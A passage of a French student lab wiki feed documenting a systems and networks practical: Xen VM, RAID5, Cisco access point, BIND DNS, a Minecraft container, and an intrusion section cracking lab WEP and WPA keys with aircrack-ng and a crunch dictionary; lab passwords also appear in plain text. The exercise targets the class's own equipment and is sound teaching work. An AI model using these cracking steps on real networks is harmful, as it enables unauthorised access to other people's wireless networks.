 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5.png]]&lt;br /&gt;
===Point d'accès wifi===&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
Mode terminal&lt;br /&gt;
 ap&amp;amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
Configuration du nom d’hôte :&lt;br /&gt;
 &amp;lt;pre&amp;gt;ap(config)#hostname SE2A5-AP1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accès SSH :&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Accès console :&lt;br /&gt;
 SE2A5-AP1(config)#line console 0&lt;br /&gt;
 SE2A5-AP1(config-line)#password glopglop&lt;br /&gt;
 SE2A5-AP1(config-line)#login authentification default&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Sécurisation des accès :&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
VLAN n°20&lt;br /&gt;
 &amp;lt;SE2A5-AP1(config)#aaa authentication login EAP_toto group RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config)#radius-server host 193.48.57.163 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 SE2A5-AP1(config)#aaa group server radius RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config-server)#server 193.48.57.163 auth-port 1812 acct-port 1813&lt;br /&gt;
 SE2A5-AP1(config-server)#exit&lt;br /&gt;
 SE2A5-AP1(config)#dot11 ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-ssid)#vlan 20&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication open eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication network-eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication key-management wpa&lt;br /&gt;
 SE2A5-AP1(config-ssid)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface g0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio 0&lt;br /&gt;
 SE2A5-AP2(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#encryption vlan 20 mode ciphers aes-ccm tkip&lt;br /&gt;
 SE2A5-AP1(config-if)#mbssid&lt;br /&gt;
 SE2A5-AP1(config-if)#ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyACM0&lt;br /&gt;
VLAN n°1 :&lt;br /&gt;
 SE2A5-AP1(config)#interface BVI 1&lt;br /&gt;
 SE2A5-AP1(config-if)#ip address 10.0.0.10 255.255.255.0&lt;br /&gt;
 SE2A5-AP1(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 SE2A5-AP1(config)#ip default-gateway 10.0.0.1&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60260</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60260"/>
				<updated>2022-11-28T23:30:02Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Point d'accès wifi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5.png]]&lt;br /&gt;
==Point d'accès wifi==&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
Mode terminal&lt;br /&gt;
 ap&amp;amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
Configuration du nom d’hôte :&lt;br /&gt;
 &amp;lt;pre&amp;gt;ap(config)#hostname SE2A5-AP1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accès SSH :&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Accès console :&lt;br /&gt;
 SE2A5-AP1(config)#line console 0&lt;br /&gt;
 SE2A5-AP1(config-line)#password glopglop&lt;br /&gt;
 SE2A5-AP1(config-line)#login authentification default&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Sécurisation des accès :&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
VLAN n°20&lt;br /&gt;
 &amp;lt;SE2A5-AP1(config)#aaa authentication login EAP_toto group RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config)#radius-server host 193.48.57.163 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 SE2A5-AP1(config)#aaa group server radius RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config-server)#server 193.48.57.163 auth-port 1812 acct-port 1813&lt;br /&gt;
 SE2A5-AP1(config-server)#exit&lt;br /&gt;
 SE2A5-AP1(config)#dot11 ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-ssid)#vlan 20&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication open eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication network-eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication key-management wpa&lt;br /&gt;
 SE2A5-AP1(config-ssid)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface g0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio 0&lt;br /&gt;
 SE2A5-AP2(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#encryption vlan 20 mode ciphers aes-ccm tkip&lt;br /&gt;
 SE2A5-AP1(config-if)#mbssid&lt;br /&gt;
 SE2A5-AP1(config-if)#ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyACM0&lt;br /&gt;
VLAN n°1 :&lt;br /&gt;
 SE2A5-AP1(config)#interface BVI 1&lt;br /&gt;
 SE2A5-AP1(config-if)#ip address 10.0.0.10 255.255.255.0&lt;br /&gt;
 SE2A5-AP1(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 SE2A5-AP1(config)#ip default-gateway 10.0.0.1&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
